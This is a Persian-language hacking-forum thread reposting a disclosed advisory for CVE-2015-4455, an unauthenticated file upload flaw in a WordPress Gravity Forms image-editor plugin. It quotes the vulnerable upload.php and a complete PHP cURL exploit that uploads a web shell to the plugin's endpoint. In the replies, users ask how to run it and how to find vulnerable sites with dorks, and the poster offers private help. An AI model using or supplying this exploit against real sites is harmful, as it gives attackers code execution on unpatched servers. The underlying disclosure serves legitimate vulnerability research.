انجمن تیم امنیتی ایران سایبر

WordPress Aviary Image Editor Add On For Gravity Forms 3.0 Beta Shell Upload

شروع موضوع توسط Endless ‏14/6/15 در انجمن Vulnerability Laboratory

  1. لطفا فایل های خود را جهت ماندگاری در انجمن اپلود کنید در صورت مشاهده لینک اپلود خروجی , تاپیک حذف خواهد شد .
    بستن اطلاعیه
بستن اطلاعیه


درود مهمان گرامي؛

مهمان گرامي، براي مشاهده تالار با امکانات کامل ميبايست از طريق ايــن ليـــنک ثبت نام کنيد .

حامی مسابقات و برگزار کننده دوره های پیشرفته ارزیابی امنیت برای سازمان ها فتح پرچم (CTF)
  1. Endless
    کاربرتازه وارد

    وضعیت:
    Offline
    تاریخ عضویت:
    ‏20/12/14
    ارسال ها:
    282
    تشکر شده:
    704
    جنسیت:
    شغل:
    Hacker & Exploiter
    محل سکونت:
    Iran-Tehran
    Name:
    WhiteTiger
    Main os:
    Kali
    PHP:
    Title: Remote file upload vulnerability in aviary-image-editor-add-on-for-gravity-forms v3.0beta Wordpress plugin
    Author: Larry W. Cashdollar, @_larry0
    Date: 2015-06-07
    Download Site: https://wordpress.org/plugins/aviary-image-editor-add-on-for-gravity-forms
    Vendor: Waters Edge Web Design and NetherWorks LLC
    Vendor Notified: 2015-06-08
    Advisory: http://www.vapid.dhs.org/advisory.php?v=125
    Vendor Contact: [email protected]
    Description: A plugin that integrates the awesome Adobe Creative SDK (formerly Aviary) Photo / Image Editor with the Gravity Forms Plugin.
    Vulnerability:
    There is a remote file upload vulnerability in aviary-image-editor-add-on-for-gravity-forms/includes/upload.php as an unauthenticated user can upload any file to the system.  Including a .php file.  The upload.php doesn't check that the user is authenticated and a simple post will allow arbitrary code to be uploaded to the server.
    In the file aviary-image-editor-add-on-for-gravity-forms/includes/upload.php the code doesn’t check for an authenticated Wordpress user:
    <?php
    2
    3 $filename 
    $_SERVER["DOCUMENT_ROOT"]."/wp-load.php";
    if (file_exists($filename)) {
    5     include_once($filename);
    } else {
    7     include_once("../../../../wp-load.php");
    }
    echo "Here";
    10 $image_file $_FILES['gf_aviary_file'];
    11 if($image_file['name']!=''){
    12      $max_file_size =  4*1024*1024;
    13      $file_size intval($image_file['size']);
    14      if( $file_size $max_file_size ){
    15          $msg "File Size is too big.";
    16          $error_flag true;
    17      }
    18      $extension strtolower(end(explode('.'$image_file['name'])));
    19      $aa_options get_option('gf_aa_options');
    20      $supported_files $aa_options['supported_file_format'];
    21      $supported_files strtolower($supported_files);
    22      if(!$error_flag && $supported_files != '' ){
    23        $supported_files explode (','$supported_files);
    24        if(!in_array($extension$supported_files)){
    25           $msg "No Supported file.";
    26           $error_flag true;
    27        }
    28      }
    29      if(!$error_flag){
    30         $wp_upload_dir wp_upload_dir();
    31         if(!is_dir($wp_upload_dir['basedir'].'/gform_aviary')){
    32              mkdir($wp_upload_dir['basedir'].'/gform_aviary');
    33         }
    34         $upload_dir $wp_upload_dir['basedir'].'/gform_aviary/';
    35         $upload_url $wp_upload_dir['baseurl'].'/gform_aviary/';
    36         $file_name $upload_dir.$_POST['gf_aviary_field_id'].'_'.$image_file['name'    ];
    37         if(move_uploaded_file($image_file['tmp_name'], $file_name)){
    38             $file_url $upload_url.$_POST['gf_aviary_field_id'].'_'.$image_file['na    me'];
    39         }
    40     }
    41     $return_obj = array('status' => 'success''message' => $file_url);
    42     echo json_encode($return_obj);
    43  }
    44 ?>
    CVEID: 2015-4455
    OSVDB:
    Exploit Code:
    <?php
    /*Remote shell upload exploit for aviary-image-editor-add-on-for-gravity-forms v3.0beta */
    /*Larry W. Cashdollar @_larry0
    6/7/2015
    shell will be located http://www.vapidlabs.com/wp-content/uploads/gform_aviary/_shell.php
    */
        
    $target_url 'http://server/wp-content/plugins/aviary-image-editor-add-on-for-gravity-forms/includes/upload.php';
        
    $file_name_with_full_path '/var/www/shell.php';
        echo 
    "POST to $target_url $file_name_with_full_path";
        
    $post = array('name' => 'shell.php','gf_aviary_file'=>'@'.$file_name_with_full_path);
        
    $ch curl_init();
        
    curl_setopt($chCURLOPT_URL,$target_url);
        
    curl_setopt($chCURLOPT_POST,1);
        
    curl_setopt($chCURLOPT_POSTFIELDS$post);
        
    curl_setopt($chCURLOPT_RETURNTRANSFER,1);
        
    $result=curl_exec ($ch);
        
    curl_close ($ch);
        echo 
    "<hr>";
        echo 
    $result;
        echo 
    "<hr>";
    ?>
     
    fastreactor، WH!T3_W01F، Rz07 و یک نفر دیگر از این ارسال تشکر کرده اند.
  2. Mr.black
    کاربرتازه وارد

    وضعیت:
    Offline
    تاریخ عضویت:
    ‏23/5/15
    ارسال ها:
    6
    تشکر شده:
    8
    جنسیت:
    شغل:
    rOOTINg
    محل سکونت:
    Tehran
    اگه میشه اموزشی از نحوه اجراش بزارین
     
  3. Endless
    کاربرتازه وارد

    وضعیت:
    Offline
    تاریخ عضویت:
    ‏20/12/14
    ارسال ها:
    282
    تشکر شده:
    704
    جنسیت:
    شغل:
    Hacker & Exploiter
    محل سکونت:
    Iran-Tehran
    Name:
    WhiteTiger
    Main os:
    Kali
    دوست عزیز نیاز به فیلم نداره
    اگه مشکلی دارید به من پ.خ کنید کامل بهتون توضیح بدم :)
    موفق باشید.
    یا حق
    ./
     
  4. Rz07
    کاربرتازه وارد

    وضعیت:
    Offline
    تاریخ عضویت:
    ‏2/5/15
    ارسال ها:
    26
    تشکر شده:
    19
    من متوجه نشدم.
    این دورک داره یا کلا توی همه Wp ها هست؟
     
  5. Endless
    کاربرتازه وارد

    وضعیت:
    Offline
    تاریخ عضویت:
    ‏20/12/14
    ارسال ها:
    282
    تشکر شده:
    704
    جنسیت:
    شغل:
    Hacker & Exploiter
    محل سکونت:
    Iran-Tehran
    Name:
    WhiteTiger
    Main os:
    Kali
    بنده شخصا خودم تست نکردم و نمیدونم.
    ولی توی اکسپلویت دورکی براش مشخص نشده.
    امتحان میکنم بهتون پ.خ میکنم.
    موفق باشید.
    ./
     
    fastreactor و Rz07 از این پست تشکر کرده اند.
بارگذاری...
به انجمن تخصصی امنیت ایران سایبر خوش آمدید . برای مشاهده تمامی تالار ها و امکانات ثبت نام کنید .